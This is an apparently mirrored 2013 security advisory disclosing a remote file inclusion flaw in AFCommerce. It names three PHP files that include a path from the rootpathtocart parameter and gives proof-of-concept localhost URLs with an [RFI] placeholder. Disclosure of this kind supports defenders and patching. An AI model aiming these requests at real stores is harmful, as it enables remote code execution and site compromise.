AFCommerce Remote File Inclusion

Published
Credit
Risk
2013.12.26
NoGe
High
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes


[o] AFCommerce a.k.a Amazing Flash Commerce <= Remote File Inclusion Vulnerability

Software : AFCommerce Professional Edition
Version : n/a
Vendor : http://www.afcommerce.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : AFCommerce is a full and complete online store with both a store front and administration area directly Out-Of-The-Box, which can be easily installed, configured, and maintained over a web-based interface. AFCommerce now includes our Ecommerce Website Building Software integrated with our free shopping cart. This allows you to create an unlimited number of custom web pages, customize font / colors of all your pages, as well as, the structural layout of your website.


=============================================================================================================

[o] Vuln

adblock.php
adminpassword.php
controlheader.php

include_once ($rootpathtocart . "/admin/customadminfooter.php");
include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php");
include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php");

=============================================================================================================


[o] Poc

http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI]
http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI]
http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI]


=============================================================================================================


[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


[o] December 25 2013 - Papua, Indonesia || Selamat Natal!! Tuhan Yesus Berkati... :)


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com